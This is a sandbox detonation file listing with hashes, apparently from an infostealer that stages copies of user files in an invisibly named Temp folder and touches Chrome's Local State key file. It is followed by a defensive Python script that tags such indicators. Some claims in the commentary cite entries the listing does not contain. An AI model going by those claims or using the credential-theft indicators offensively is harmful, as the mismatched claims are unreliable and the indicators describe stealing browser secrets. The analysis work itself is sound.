MD5 0ac871344dc49ae49f13f0f88acb4868
SHA1 5a073862375c7e79255bb0eab32c635b57a77f98
SHA256 688f15b59a784f6f4c62554f00b5d0840d1489cef989c18126c70dfee0806d37
SHA512 ace5c50303bd27998607cf34ac4322bcf5edfbd19bbb24309acf4d037b6f3f7636c7c14b6ac0b924114e036252d3a1b998951c7068f41548728fa5d92f5f9006

C:\Users\Admin\AppData\Local\Temp\[U+2008 U+200C U+200A U+200A U+2007 U+200A U+2006 U+2004 U+2004 U+20??]\Display (1).png
(the directory under Temp is named with ten invisible Unicode characters: punctuation space, zero width non-joiner, hair space x2, figure space, hair space, six-per-em space, three-per-em space x2, and a tenth from the U+2000 block whose final byte did not survive extraction; the raw report renders that UTF-8 sequence as the garbled string β€ˆβ€Œβ€Šβ€Šβ€‡β€Šβ€†β€„β€„β€. Every "Common Files" entry below sits in this same directory)

MD5 1706ebfc6d1f50f1c17a4d5771b52d47
SHA1 97943a59f3ef6315e33f0d6f5d68b94bbe8a87a5
SHA256 3cdcbcc8633cc982a16e5e1f0295ca20dbaab762dda41e4ccad3ae6247f6cf1f
SHA512 53d63ef78c4274586247927d4282dcbc941aade47b617f4613a81dc98edf5322027104dd8748b67f0082d4451cfebddc7bd673f44b4642e67efa52a81e9e2c17

C:\Users\Admin\AppData\Local\Temp\[U+2008 U+200C U+200A U+200A U+2007 U+200A U+2006 U+2004 U+2004 U+20??]\Common Files\Documents\Recently.docx

MD5 3b068f508d40eb8258ff0b0592ca1f9c
SHA1 59ac025c3256e9c6c86165082974fe791ff9833a
SHA256 07db44a8d6c3a512b15f1cb7262a2d7e4b63ced2130bc9228515431699191cc7
SHA512 e29624bc8fecb0e2a9d917642375bd97b42502e5f23812195a61a4920cae5b6ed540e74dfcf8432dcceb7de906ad0501cdd68056f9b0ec86a6bb0c1e336bfe32

C:\Users\Admin\AppData\Local\Temp\[U+2008 U+200C U+200A U+200A U+2007 U+200A U+2006 U+2004 U+2004 U+20??]\Common Files\Documents\UnpublishFind.csv

MD5 9617e30bf9f7c036dba4e8679aef51aa
SHA1 b6be1739a5b0ace996679a13a802ee7908d1a673
SHA256 94fdd91845526a0a7fa0ad8dd01ba1cdbb2d968c93bced5602be0a49d1a8aaf3
SHA512 19f3e025a530a8aeb7594ece00ff81b207c2c8dbb55fb52bca5f42e834de18da5130b462944ced4b43eb433ca6d9e5c7e36108b3e1ff3aad6011208bb3b96761

C:\Users\Admin\AppData\Local\Temp\[U+2008 U+200C U+200A U+200A U+2007 U+200A U+2006 U+2004 U+2004 U+20??]\Common Files\Documents\These.docx

MD5 87cbab2a743fb7e0625cc332c9aac537
SHA1 50f858caa7f4ac3a93cf141a5d15b4edeb447ee7
SHA256 57e3b0d22fa619da90237d8bcf8f922b142c9f6abf47efc5a1f5b208c4d3f023
SHA512 6b678f0dd0030806effe6825fd52a6a30b951e0c3dcf91dfd7a713d387aa8b39ec24368e9623c463360acba5e929e268f75ce996526c5d4485894b8ac6b2e0fa

C:\Users\Admin\AppData\Local\Temp\[U+2008 U+200C U+200A U+200A U+2007 U+200A U+2006 U+2004 U+2004 U+20??]\Common Files\Music\SyncRename.mp4

MD5 66c47a1078e90b5a0ea086390a63514c
SHA1 b55c330fb4ac218140fab37a4da39a644e8f821e
SHA256 181e10855a6c2bb55a30d8ee8793e4b092172fc0b1d3a1f2672fb16596f6df14
SHA512 cff760548f52507bca28d3ee53d948954948e9ae275642c25ba8b4b861f20f60c9bc0f59211a4b4fb7c8227393b64d7fdc1129266221c9b929f01db85f30496a

C:\Users\Admin\AppData\Local\Temp\[U+2008 U+200C U+200A U+200A U+2007 U+200A U+2006 U+2004 U+2004 U+20??]\Common Files\Music\SuspendSet.txt

MD5 0779c6b2668c66303b811ea1230a0b61
SHA1 891cb97823e05db6dd434626b11a890564367a1e
SHA256 76d0a3df07587bf50c17eb6bf0ede39d3dd0456950e14a7659b058f59a3b70cd
SHA512 95a6e44574fc4605f8c956977c3c3dbf01fa56c2d79a7b843cce5aa31680d6a2b0ddbd1e07f185405452fac548fb290971db22fe696b6fc70568bcf0475e5c6b

C:\Users\Admin\AppData\Local\Temp\[U+2008 U+200C U+200A U+200A U+2007 U+200A U+2006 U+2004 U+2004 U+20??]\Common Files\Music\PublishSkip.pdf

MD5 027cd83dab222d26a8ce85afa3919a3c
SHA1 edb8102f5e3ffcd9b05b55bc405249c006420e93
SHA256 b35217fa322fae0c4b0b271e9e31be8eca733786803e972bafc1670b90d54129
SHA512 5c19493313b2443158d8b9fa3350758b78cabd83992894d873e45385e1fa2f427b95484dba73af77ea5e3ea767cf8a516e9a0ad9fdcb1cf65d5021b70846cb49

C:\Users\Admin\AppData\Local\Temp\[U+2008 U+200C U+200A U+200A U+2007 U+200A U+2006 U+2004 U+2004 U+20??]\Common Files\Music\CompleteBackup.emf

MD5 12247157a1b1caa9d9249e9787aaa844
SHA1 b2670c5d4bad1ccd0f287d8c37b244e486052cc8
SHA256 3301aaf7db5699bf310cf030cf8f6b996acede955f1e65b3d3176465ee148812
SHA512 60bbbdf0eda12f231de484aa4dd4bde4159b2e3b213729b2ff0a8a86b9f7bab39e9beb294ad015f4d2268927543e9567892b6ffaffc860883579c2b8e940a251

C:\Users\Admin\AppData\Local\Temp\[U+2008 U+200C U+200A U+200A U+2007 U+200A U+2006 U+2004 U+2004 U+20??]\Common Files\Documents\ResetResume.csv

MD5 1b6d7987f31a7fb899fde89476dc9b53
SHA1 7f841df015551ef4333f7b5dc4781901e7444af9
SHA256 6bc3e9d8127b2f5943a450edd5295d072966a74a30b13b66df196968befb8b59
SHA512 9fbdda53dd079f294bbb71d231d497c6081be5b54d786d5035f87b0bfb0e6a7ec2f71bc6b594c1582709489494068af8f2ddf8e54ee319e9845c301eeace52c2

C:\Users\Admin\AppData\Local\Temp\[U+2008 U+200C U+200A U+200A U+2007 U+200A U+2006 U+2004 U+2004 U+20??]\Common Files\Documents\Opened.docx

MD5 bfbc1a403197ac8cfc95638c2da2cf0e
SHA1 634658f4dd9747e87fa540f5ba47e218acfc8af2
SHA256 272ed278e82c84cf4f80f48ec7989e1fc35f2055d6d05b63c8a31880846597a6
SHA512 b8938526fcbf7152805aec130ca553e3ec949cb825430a5d0a25c90ec5eb0863857010484a4b31fdc4bb65a4c92ad7127c812b93114be4569a677f60debe43b1

C:\Users\Admin\AppData\Local\Temp\[U+2008 U+200C U+200A U+200A U+2007 U+200A U+2006 U+2004 U+2004 U+20??]\Common Files\Documents\Files.docx

MD5 4a8fbd593a733fc669169d614021185b
SHA1 166e66575715d4c52bcb471c09bdbc5a9bb2f615
SHA256 714cd32f8edacb3befbfc4b17db5b6eb05c2c8936e3bae14ea25a6050d88ae42
SHA512 6b2ebbbc34cd821fd9b3d7711d9cdadd8736412227e191883e5df19068f8118b7c80248eb61cc0a2f785a4153871a6003d79de934254b2c74c33b284c507a33b

C:\Users\Admin\AppData\Local\Temp\[U+2008 U+200C U+200A U+200A U+2007 U+200A U+2006 U+2004 U+2004 U+20??]\Common Files\Documents\Are.docx

MD5 a33e5b189842c5867f46566bdbf7a095
SHA1 e1c06359f6a76da90d19e8fd95e79c832edb3196
SHA256 5abf8e3d1f78de7b09d7f6fb87f9e80e60caacf13ef3c1289665653dacd7c454
SHA512 f2ad3812ec9b915e9618539b0f103f2e9acaad25fbbacd84941c954ce070af231324e83a4621e951c1dbae8d40d50410954e40dd52bbd46e34c54b0d1957407b

C:\Users\Admin\AppData\Local\Temp\[U+2008 U+200C U+200A U+200A U+2007 U+200A U+2006 U+2004 U+2004 U+20??]\Common Files\Desktop\CheckpointFind.mp3

MD5 bdfbf90c981427daa2819fcc47294294
SHA1 741d922290a27f11bb411d3b6d491366495adb09
SHA256 2f49919673cb31f073d21de1aa87a0998ef3bdc1c1ef96526204d2261a194e19
SHA512 023ddf5aeae3a175fc1c3b01ae3814d255542ecf79113219df7c7aa469cbf553ab59266bbe2e013f34f99bee917f265888f17421517ef26c87a6c2ec2c94b94b

C:\Users\Admin\AppData\Local\Temp\[U+2008 U+200C U+200A U+200A U+2007 U+200A U+2006 U+2004 U+2004 U+20??]\Common Files\Pictures\My Wallpaper.jpg

MD5 a51464e41d75b2aa2b00ca31ea2ce7eb
SHA1 5b94362ac6a23c5aba706e8bfd11a5d8bab6097d
SHA256 16d5506b6663085b1acd80644ffa5363c158e390da67ed31298b85ddf0ad353f
SHA512 b2a09d52c211e7100e3e68d88c13394c64f23bf2ec3ca25b109ffb1e1a96a054f0e0d25d2f2a0c2145616eabc88c51d63023cef5faa7b49129d020f67ab0b1ff

C:\Users\Admin\AppData\Local\Temp\[U+2008 U+200C U+200A U+200A U+2007 U+200A U+2006 U+2004 U+2004 U+20??]\Common Files\Pictures\SwitchOut.jpg

MD5 fba677f1eccf9a476c5d8b33b3a43d9e
SHA1 2111462f473b89cdc08afdca28495308bb07628f
SHA256 6b95c7cbdaaa24a7cceddfa79dc66bfedca52a75acece09c82857e6dfa167a34
SHA512 85b364d6ea4547f68cf61f099a47d2041b8ef0368ee6c930d8929fbc97de31300ae7aca041214943c8604efddd0b7afc66289477762f2ed1559a710c62b096ab

C:\Users\Admin\AppData\Local\Temp\[U+2008 U+200C U+200A U+200A U+2007 U+200A U+2006 U+2004 U+2004 U+20??]\Common Files\Pictures\ResizeDisconnect.jpeg

MD5 03abd1908f311d52ecdb631ef20becee
SHA1 19831976de86be54dca908035104db64a669a5ba
SHA256 15dc294f2daaf62b41c33cf814c18742b570847f2721439834e1dc11d865347a
SHA512 80c51b50907e811150d46651ab2eb74ce5123cad27c12bd3df38d0234495327820ac2e8ffb4ff3022facf5a514067009d473a3ca88923656d4f4d798365efc7b

C:\Users\Admin\AppData\Local\Temp\[U+2008 U+200C U+200A U+200A U+2007 U+200A U+2006 U+2004 U+2004 U+20??]\Common Files\Pictures\OptimizeConvertTo.jpg

MD5 167a49bb88a2c6dd0231b5d1275d78bf
SHA1 7f09adf1a95f606b7a8b9af747892f542a5c84cd
SHA256 bd13ea72cdd7653204e5a663593027d80778132401932fffc824ed64b252c4a3
SHA512 a6624e7fe6153fd01fcadb08d295916b275320724dec70e5192a6b9e391694aff44b709d42b0cce69e251a8aeebef182f84cff8bfe2907aeb4774f75c8e578ad

C:\Users\Admin\AppData\Local\Temp\[U+2008 U+200C U+200A U+200A U+2007 U+200A U+2006 U+2004 U+2004 U+20??]\Common Files\Pictures\SwitchSplit.jpeg

MD5 f51fe9ff9e13400fd279212016c3f6bb
SHA1 5cd7bf7305d588f03cb4f0b18aea54641a525285
SHA256 053f379e49d2d0fedc64f10271e07bacca5104f199200d85932012cf71bff6bd
SHA512 0f5476b1cbb6aaff4c7f3fcb4bbbd9d188037a5921efc18132d857f4629e94c5182f6b26788c8b80d01d1f5394012729c2eb008d822c4932d13b272d6031a1b3

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 60a84ea8f3888e51bb0fe4856926a639
SHA1 43848b5a831f8fe7623694b36b17554b83770269
SHA256 5d219511d1091f4dc52ef6664815bcacf013c76b695bf2195aa439a6cc431504
SHA512 f6381deedc9612c96914173d948bd601192256c1b65a6b6be3c6664de84df64fb8740fa0205846e0380305bf5442e52991d134ff94b8edc899775befcc4a86ba

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 c6aae9fb57ebd2ae201e8d174d820246
SHA1 58140d968de47bcf9c78938988a99369bbdb1f51
SHA256 bbc39a8da61fd8ec0d64e708e1ab4986f7fdf580581e464629bf040c595f7c08
SHA512 5959f7dab47bc4bad03635f497ca48f2e0740375528afddfc50964e54983e56df5970b25b8d8b28f1aa73cd6233fac83c634a311e759c58a365570e4862c3e3c

\??\pipe\crashpad_4920_YJYJWXXFJYKEEHSL

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\1107aee8-daad-4ccf-b58b-ed67a490c852.tmp

MD5 d751713988987e9331980363e24189ce
SHA1 97d170e1550eee4afc0af065b78cda302a97674c
SHA256 4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
SHA512 b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

MD5 121aac0387d1f2694ce74c8fef572e21
SHA1 645cc5c6a8a7287a6f37ad7dcb0b68e3b779af02
SHA256 a283a97108c3249c1a770bb8ec72750af56f45cba42094af834829a87fae4b23
SHA512 5aef772d06f257138412d0c6bc60678f39cff68ad4d444eb2f986760f9cd786f1311ec5070ee466e90999b65351060711f764b6b262899573b1e9513451faa06

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\57871764-d455-4ddd-81c7-365ac9220fa3.tmp

MD5 db70e63fb40d0c1673e51814db052acc
SHA1 72bcd059eb99d9fb97324576b492fda8bd478a11
SHA256 15dcdd7f46697c0ea5092d5dc0a103854c48606212a851e1ced1971d578bd00c
SHA512 9f2be5dcae83700dd1865141643dcf168b1f55fbefe248703fa24dc87ed725f2ffcd0a7241d18cf5b6cc55193b25e393899c7b81ee4d4e3c08d4b92ea7fc95c1

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

MD5 3f57bd8fa4cba8dc0d150627073a1227
SHA1 6b4bd816ef314f741b516770573159dc100b21ad
SHA256 003e2496cbf2d61118084f3bfeaeef7845a11fab0f08c501d8ef971f809ec28b
SHA512 063862d2c0288610ac68a2a6940058070684bff44f74be1365f85f0acd5557b6f6606a79ddf5f250feb517002fb558b59e898e2818e70e361dc7d63977b8183c

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

MD5 3d367cd091876680a11602cb03e811d6
SHA1 f171d6be3934496d66bc05d32c19cee21a28b9de
SHA256 1f6d9882af4beef6e1eff0ac691a0663c6e29a9f8e77f6bb970d461694451771
SHA512 84e3aa38ed4f00fcdbda572032e04a9e9f46949c41e95e5eeed21d7e84d4645dc48c650f5f62f908f99154c5f21991ab1d776baeb72afe6387a7fc41a2d9b88a

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 1175b4b07c9621ca5baf21a202a92211
SHA1 7029bb2c159b17ec1ca1a80cdf72e176dec33a5d
SHA256 cb9ea89764da2405758d00a1946ba27cd42998ed3be642539e7a3171eb0942fa
SHA512 ecba43628657a773cff0f8e9cc5cbbcded1354004ad15a9c05eb7527b666fd50f84b974c23a9a270977f18f2d3960e8a1fb868fc591a2927e50dfbb60878a912

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

MD5 d3e50245153fe976be4e355f2fcea4be
SHA1 624ac0832eafbfbff5c625981eb23ac8d0f058d9
SHA256 b92320054d4248d3eed5298e665174179ec044714e3e237ed31fe9b2b7705537
SHA512 ca64502377462647245cded369955302836cd6817e8e7c8273647626e080a2c9b5481c42d970c1bf79c46259b0cc57691afb30ec78199623f2d2908aef6d0cf4

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 3f9b44e3fcdb20bef02e9914fc466ed2
SHA1 c95b40e9721975205d564e5c20ec54b7fcbd77e2
SHA256 cd8f92a52cb0cff0629f2b12ae7fb92b4690d3981e268e96332d1c2b329848aa
SHA512 9a8e0c5013262abc9e19a33d80b4b7a2b0d31f8472001f35b11849c242aa444007772e016b1b1936b4107bf8ac506a2ac5741e654274cf897779e9e802de44e4

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

MD5 a505287223e271dd3caf893a8f15fab0
SHA1 cd043aac2e0384d0679bef0f5eb5c1e5144f8e49
SHA256 40d8268e1969f7aedbf178270f0cc3cd7af05946b9ae2035ebcf119d33755082
SHA512 af65b1844c4b9243a64539511474057db755b70d08bf309bda2031b39b13b4688bf1787d663f0995f7f1eb3f27fba5fd354daf8c8305c0b8c3b8326458d28a32

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 6ff4ddeb0cfe9bc4903a797b9edea4b4
SHA1 1aabfb7b003ac918e29cf76358679bf1ad415da2
SHA256 6139f36b178aba5806bbcccc11f37f9c47ce6f63897478121bfacc43c250ab0e
SHA512 b3b2bba66bcef27e1bf3f0bea6bc14c0c4126c8e05ff8dab3aefdce7c08e6fc7dfc3c2ac71781d2d8e852733cd40c398611f6a5af0c3b3f739d18f7cf86e1d4f

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

MD5 07bea70eaf2ad2ce002c6bf2e2d9d12b
SHA1 b2aec515b84050761b949ad9ee9da908f82618a8
SHA256 3b9ae63a27c1059a9089af81ec4b5b0300ed61e93cdc8f019485ee846b33bf46
SHA512 a8895816235120584c63eea963a10b2e6697726a2fbb5e442a6c544a7c92411b8a136ebbc3fb6d87c9f08f910e357bb68868822eaf2978f921f646cce41932a5

C:\Users\Admin\AppData\Local\Microsoft\Windows\Explorer\iconcache_idx.db

MD5 444fd300f57f350a73bd2b22f2fd15d2
SHA1 ba28680b43b0c3d5e347cf11b2ffb14528ce0def
SHA256 74921a4345f5826a65ae4b8ff263cd4256191580376189a59ecf640430131573
SHA512 ab6e929ddfff4716412daeb0fae41c31d22d9139538a21b841f90c74d1bf38ff42c09d091254ede543e98ee93598541c505895274d8153732388dd9a211ebec2

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000024

MD5 585ac11a4e8628c13c32de68f89f98d6
SHA1 bcea01f9deb8d6711088cb5c344ebd57997839db
SHA256 d692f27c385520c3b4078c35d78cdf154c424d09421dece6de73708659c7e2a6
SHA512 76d2ed3f41df567fe4d04060d9871684244764fc59b81cd574a521bb013a6d61955a6aedf390a1701e3bfc24f82d92fd062ca9e461086f762a3087c142211c19

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

MD5 f415b581a2c9d6d649a5c9967c846941
SHA1 c8c85518c7ea74464456990f127bb093f41f97e6
SHA256 2abaa6537dc3731e2fd34707fe23335ab243c16cf35e7d5811089fc27c0f2cac
SHA512 6c9759783648398c5f93819cdb3b2219b14eebc05ba1add190d820e0dfaf1aef21afb47f17231dce06824c15b902b7963debeb052e3ce8ab81378d89fb0735ac

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\temp-index

MD5 5a192948842d852e1a77633cb26d3d9d
SHA1 9324aada14b9d81ce9bccfa138ffe2f9f229f934
SHA256 ad97f8e2f898f9294ae8b03d3a0d5f388c5e46cd55cd2572d93024c65adc9133
SHA512 75de8525cdd1ea463c118547d6d6fb8bd328eb1643784cf6825bfc363f0433c147f6a77c2fbca810c2591964554aaa27b46de9caa1109f6110fed9e9f5c4d938

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

MD5 40d5dcb9c0313a67b61e4e7281995c91
SHA1 b5ab966f2d55c3884b89fd8dfdd29c57416722bf
SHA256 bf4c9d6413ec1e68de3198aaeb97287a30eba4407dc9aa4850e676b991ea54da
SHA512 f464ef48daf2a4251f45dfeeb7c40c9b3fd4bd1d268fb3f029b02894cfe96ff4f558871ee5f67686fcd3ce92d9f2ae45b0b78c3dfa8d5db5bfebbc9b71716674

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000023

MD5 f782de7f00a1e90076b6b77a05fa908a
SHA1 4ed15dad2baa61e9627bf2179aa7b9188ce7d4e1
SHA256 d0b96d69ee7f70f041f493592de3805bfb338e50babdee522fcf145cb98fc968
SHA512 78ec6f253e876d8f0812a9570f6079903d63dd000458f4f517ec44c8dd7468e51703ea17ecce2658d9ea1fdb5246c8db5887a16be80115bbf71fe53f439d8766

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

MD5 9184db83e6f02526b19df6d4aa4ed97b
SHA1 8499df68482cfeea4f635206333ddb0816f65418
SHA256 8492f88bf69bb6f8dd2fae419c85bb253bf376f0384e70fe97ef82afc8e7df46
SHA512 f2a4ed33ba7f6d6d2878c8d0e9bf23d285e8c6f32200365c1d9925cd65999faba08df34cec7e543ea1c800d569a02e84a02b8a6f6a48e06edd8e2c78cc99ac27

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

MD5 91e4c3c30df373fe29daf75b661b8ec3
SHA1 995fbe4516398134d3c6e6e1efaff551ec0bb44f
SHA256 6cf2910c2b3f0320d445a9f98631600d040872f950fea5591f832e04f857d5e7
SHA512 4e62385b74d77f16627e571b0720d235a7ddfde6aac6505729774273c20edc3faeb741dd8e0fb7bcd76ff6a75019750e568be9e2ee414fc030f8028e05acc268

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

MD5 62a8720cee7b043c7c448dc6e7412688
SHA1 c6efe42e12e93e0bcf4ac167237d095722bb3946
SHA256 05b091094e69be8332d031fb343b69748b6be6b6c4e95ce473d48b36785c37bc
SHA512 4e48ad376044ef9baa35a541874cf16cf9a8cd8cd625a5ce7da3fd0ed1d1876eaa4653e7690919a191dd74907ab272697ab53c4aa7142ef2fa67e5b02923b958

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 43c829d9a690226590dc49cd585bd401
SHA1 6e7466685b77f5c5aa08c14c516b140a881c1e6e
SHA256 29765ec1ed0e5711feec81c70dd4a8d4d1efbc1beb72df2984c3734d2550e4ac
SHA512 ae6dd38e58f463d9df17fee4981f1444921be1010fce0176c2681ef24ca83b6813ce5742ce7db5ffaad13c9c8a5504c9ab312138728c17fd608c1411bfdf2efb
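The listing above is raw detonation output. What follows is an added triage example, not part of the sandbox report or of any tool it names. It parses entries in this report's layout (a path line, a blank line, then MD5/SHA1/SHA256/SHA512 lines) and tags the ones an analyst would act on: the PyInstaller _MEI<pid> extraction directory (libcrypto-3.dll there is the bundled OpenSSL); the files powershell.exe writes whenever it starts (__PSScriptPolicyTest_*.ps1 is its WDAC/AppLocker policy probe, StartupProfileData-NonInteractive its JIT startup profile, listed here six times with six different digests, and CLR_v4.0\UsageLogs\powershell.exe.log the CLR usage log), which back the PowerShell signature; the wk133bt4\wk133bt4.cmdline, .0.cs and .dll files plus CSC*.TMP and RES*.tmp, which is exactly what csc.exe leaves behind when PowerShell compiles C# through Add-Type; the staging directory under Temp whose name is a run of invisible Unicode characters (U+2008 U+200C U+200A U+200A U+2007 U+200A U+2006 U+2004 U+2004 followed by one more U+2000-block character that the report extraction did not preserve) and whose contents mirror the user's Documents, Desktop, Music and Pictures folders; Chrome profile files, of which Local State matters most because it carries the DPAPI-protected key Chrome uses for saved passwords and cookies; and the crashpad_<pid> named pipe, Chromium's crash-handler channel, which shows a Chromium browser was running while those profile files were written. Entries whose digests are those of a zero-byte file are tagged as well. The sample listing embedded in the script is constructed from a subset of the entries above, with U+200D standing in for the unrecoverable tenth character of the hidden directory name; the tag names are this example's own.

```python
"""Triage a sandbox "Files" listing (added example; not from the report or any tool it names)."""
import re
import unicodedata
from collections import Counter
from dataclasses import dataclass, field
from typing import Dict, List

# Digests of a zero-byte file: the entry was created but nothing was written to it.
EMPTY_MD5 = "d41d8cd98f00b204e9800998ecf8427e"
EMPTY_SHA256 = "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855"

# What csc.exe leaves behind when PowerShell compiles C# via Add-Type:
# %TEMP%\<rnd>\<rnd>.cmdline, <rnd>.0.cs, <rnd>.dll, CSC<hex>.TMP and %TEMP%\RES<hex>.tmp
ADD_TYPE_RE = re.compile(r"\\Temp\\([^\\]+)\\\1\.(?:cmdline|0\.cs|dll|pdb)$", re.I)
CSC_TMP_RE = re.compile(r"\\Temp\\[^\\]+\\CSC[0-9A-F]+\.TMP$", re.I)
RES_TMP_RE = re.compile(r"\\Temp\\RES[0-9A-F]+\.tmp$", re.I)
PYINSTALLER_RE = re.compile(r"\\_MEI\d+\\")          # onefile bootloader unpack dir
POWERSHELL_STARTUP = (                               # written by powershell.exe itself
    "__psscriptpolicytest_",                         # WDAC/AppLocker policy probe script
    "\\startupprofiledata-noninteractive",           # multicore-JIT startup profile
    "\\clr_v4.0\\usagelogs\\powershell.exe.log",     # CLR usage log
)
HASH_LINE_RE = re.compile(r"^(MD5|SHA1|SHA256|SHA512)\s+([0-9a-f]{32,128})$")


@dataclass
class FileEntry:
    path: str
    hashes: Dict[str, str] = field(default_factory=dict)
    tags: List[str] = field(default_factory=list)


def parse_listing(text: str) -> List[FileEntry]:
    """Path/hash blocks -> FileEntry; memory/<pid>-... dump lines carry no digests and are skipped."""
    entries: List[FileEntry] = []
    current = None
    for raw in text.splitlines():
        line = raw.strip(" \t\r")  # only ASCII whitespace: exotic Unicode blanks are evidence
        if not line:
            continue
        m = HASH_LINE_RE.match(line)
        if m and current is not None:
            current.hashes[m.group(1)] = m.group(2)
        elif line.startswith("memory/"):
            current = None
        else:
            current = FileEntry(path=line)
            entries.append(current)
    return entries


def hidden_chars(component: str) -> List[str]:
    """Code points in one path component that render as nothing or as blank: Unicode space
    separators other than ASCII space, and format controls (ZWJ/ZWNJ, bidi marks). NTFS allows all."""
    return [f"U+{ord(c):04X}" for c in component
            if c != " " and unicodedata.category(c) in ("Zs", "Cf")]


def tag_entry(entry: FileEntry) -> List[str]:
    path, low, tags = entry.path, entry.path.lower(), []
    if entry.hashes.get("MD5") == EMPTY_MD5 or entry.hashes.get("SHA256") == EMPTY_SHA256:
        tags.append("empty-content")
    if PYINSTALLER_RE.search(path):
        tags.append("pyinstaller-extract")
    if any(marker in low for marker in POWERSHELL_STARTUP):
        tags.append("powershell-started")
    if ADD_TYPE_RE.search(path) or CSC_TMP_RE.search(path) or RES_TMP_RE.search(path):
        tags.append("powershell-add-type")
    components = path.split("\\")
    if any(c and len(hidden_chars(c)) == len(c) for c in components):
        tags.append("hidden-unicode-name")       # a whole name made of invisible characters
    elif any(hidden_chars(c) for c in components):
        tags.append("hidden-unicode-chars")
    if "\\google\\chrome\\user data\\" in low:
        tags.append("chrome-profile")
        if low.endswith("\\local state"):        # os_crypt.encrypted_key lives here
            tags.append("chrome-key-material")
    if low.startswith("\\??\\pipe\\crashpad_"):  # Chromium crash handler was running
        tags.append("chromium-crashpad-pipe")
    return tags


def triage(text: str) -> List[FileEntry]:
    entries = parse_listing(text)
    for e in entries:
        e.tags = tag_entry(e)
    return entries


def summarize(entries: List[FileEntry]) -> Dict[str, int]:
    """Tag -> number of entries carrying it."""
    return dict(Counter(t for e in entries for t in e.tags))


# Constructed sample: a subset of the report's entries. U+200D is a stand-in for the tenth
# character of the hidden directory name, which the report extraction did not preserve.
HIDDEN_DIR = "\u2008\u200c\u200a\u200a\u2007\u200a\u2006\u2004\u2004\u200d"
SAMPLE_LISTING = "\n".join([
    r"C:\Users\Admin\AppData\Local\Temp\_MEI26002\libcrypto-3.dll", "",
    "MD5 e547cf6d296a88f5b1c352c116df7c0c", "",
    "memory/1488-53-0x00007FFB26A63000-0x00007FFB26A65000-memory.dmp", "",
    r"C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_0vv2y2ww.gkv.ps1", "",
    "MD5 d17fe0a3f47be24a6453e9ef58c94641", "",
    r"\??\c:\Users\Admin\AppData\Local\Temp\wk133bt4\wk133bt4.0.cs", "",
    "MD5 c76055a0388b713a1eabe16130684dc3", "",
    r"C:\Users\Admin\AppData\Local\Temp\wk133bt4\wk133bt4.dll", "",
    "MD5 cb731908f89125bb1e9903c0df0550e0", "",
    "C:\\Users\\Admin\\AppData\\Local\\Temp\\" + HIDDEN_DIR + "\\Common Files\\Documents\\Recently.docx", "",
    "MD5 3b068f508d40eb8258ff0b0592ca1f9c", "",
    r"\??\pipe\crashpad_4920_YJYJWXXFJYKEEHSL", "",
    "MD5 d41d8cd98f00b204e9800998ecf8427e",
    "SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855", "",
    r"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State", "",
    "MD5 121aac0387d1f2694ce74c8fef572e21",
])

if __name__ == "__main__":
    found = triage(SAMPLE_LISTING)
    for e in found:
        print(", ".join(e.tags) or "-", "|", e.path.encode("unicode_escape").decode())
    print(summarize(found))
```

Run against a full listing, the summary alone separates the noise (browser cache, icon cache) from the three things worth writing up: the PowerShell compile chain, the invisible staging directory, and the Chrome key material. The hidden-name check deliberately flags any component made entirely of Zs/Cf characters rather than matching this sample's exact sequence, since the sequence is random per build.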